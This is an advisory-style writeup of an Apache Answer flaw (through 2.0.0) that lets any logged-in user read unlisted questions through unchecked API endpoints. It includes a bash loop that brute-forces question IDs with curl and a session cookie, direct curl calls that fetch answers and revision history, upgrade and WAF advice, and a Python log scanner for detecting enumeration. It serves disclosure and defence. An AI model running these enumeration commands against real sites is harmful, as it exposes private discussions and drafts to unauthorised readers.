The vulnerability exists in Apache Answer versions up to and including 2.0.0. The core issue lies in the “unlisted question” feature, which is intended to hide questions from public listing but still allow access via direct links or to authorized users. However, the backend API endpoints that serve these unlisted questions did not implement proper access control checks.
An authenticated attacker (any logged-in user with a valid session) can directly call specific REST API endpoints that return metadata and content for unlisted questions. The flawed endpoints include those that fetch question details, answers, comments, and revision history. Because the API only verifies that the user is authenticated, not whether that user is the owner or a permitted viewer of the unlisted question, the attacker can enumerate question IDs (which are often sequential or predictable) and retrieve sensitive information.
For example, by issuing a GET request to `/api/v1/questions/{id}` for an unlisted question, the server responds with the full question body, answers, and comments. Similarly, the revision history endpoint exposes previous edits, potentially leaking draft content or deleted information. The attack does not require elevated privileges; any authenticated user can exploit this. The issue was fixed in version 2.0.1 by adding ownership and permission checks to all API routes handling unlisted content.
DailyCVE Form:
Platform: Apache Answer
Version: through 2.0.0
Vulnerability: Unlisted question access
Severity: Medium (CVSS)
Date: 9 June 2026
Prediction: 9 June 2026
What Undercode Say:
```bash
# List all questions (including unlisted) by brute-forcing IDs
for id in {1..1000}; do
  curl -s -X GET "https://target.example.com/api/v1/questions/$id" \
    -H "Cookie: session=YOUR_SESSION_COOKIE" \
    -H "X-Requested-With: XMLHttpRequest" | grep -q "unlisted" && echo "Found unlisted question ID: $id"
done

# Directly fetch answers and comments of an unlisted question
curl -s -X GET "https://target.example.com/api/v1/questions/42/answers" \
  -H "Cookie: session=YOUR_SESSION_COOKIE"

# Access revision history (leaks previous edits)
curl -s -X GET "https://target.example.com/api/v1/questions/42/revisions" \
  -H "Cookie: session=YOUR_SESSION_COOKIE"
```
Exploit:
An authenticated attacker sends crafted GET requests to `/api/v1/questions/{id}`, `/api/v1/questions/{id}/answers`, `/api/v1/questions/{id}/comments`, and `/api/v1/questions/{id}/revisions` for any numeric question ID. The server returns full data for unlisted questions without verifying the requesting user’s relationship to the question. Attackers can automate ID enumeration to harvest all unlisted content across the platform.
Protection:
Upgrade to Apache Answer version 2.0.1 or later. If immediate upgrade is not possible, apply a Web Application Firewall (WAF) rule to block API requests to `/api/v1/questions/` from non-owner users, or manually patch the permission middleware to enforce `question.visibility` checks on all API endpoints.
Impact:
Confidentiality breach of unlisted questions, answers, comments, and revision history. An attacker can read sensitive internal discussions, draft content, and deleted revisions. The vulnerability violates the platform’s privacy model and can lead to data leakage in private communities or enterprise deployments.
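To check whether these endpoints were enumerated before the upgrade, access logs can be scanned for a single account walking a long run of consecutive question IDs. The following is an added example, not code from Apache Answer or from this advisory; the log line format (`<user> <method> <path> <status>`), the sample lines, the thresholds and the function names are all assumptions to adapt to your own proxy or application logs.

```python
import re
from collections import defaultdict

# The four GET endpoints named in the advisory, with the numeric question ID captured.
ENDPOINT = re.compile(r"^/api/v1/questions/(\d+)(?:/(?:answers|comments|revisions))?$")

# Constructed sample input. Assumed line format: "<user> <method> <path> <status>".
SAMPLE_LOG = (
    [f"u17 GET /api/v1/questions/{i} {404 if i % 3 == 0 else 200}" for i in range(1, 41)]
    + [
        "u17 GET /api/v1/questions/12/revisions 200",
        "u02 GET /api/v1/questions/7 200",
        "u02 GET /api/v1/questions/7/answers?page=1 200",
        "u02 GET /api/v1/questions/311 200",
        "u02 POST /api/v1/questions/7/comments 200",
    ]
)


def longest_run(ids):
    """Length of the longest run of consecutive integers in a set of IDs."""
    best = 0
    for i in ids:
        if i - 1 not in ids:  # i starts a run
            n = 1
            while i + n in ids:
                n += 1
            best = max(best, n)
    return best


def flag_enumeration(lines, min_distinct=20, min_run=10):
    """Return {user: (distinct_ids, longest_run, ids_answered_200)} for suspects."""
    asked, served = defaultdict(set), defaultdict(set)
    for line in lines:
        fields = line.split()
        if len(fields) != 4:
            continue  # not in the assumed format
        user, method, path, status = fields
        match = ENDPOINT.match(path.split("?", 1)[0])  # ignore the query string
        if method != "GET" or not match:
            continue
        qid = int(match.group(1))
        asked[user].add(qid)
        if status == "200":
            served[user].add(qid)  # content was actually returned for this ID
    return {
        user: (len(ids), longest_run(ids), len(served[user]))
        for user, ids in asked.items()
        if len(ids) >= min_distinct and longest_run(ids) >= min_run
    }
```

For each flagged account, the IDs answered with 200 are the ones to compare against the list of unlisted questions when scoping the exposure.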
Sources:
Reported By: nvd.nist.gov

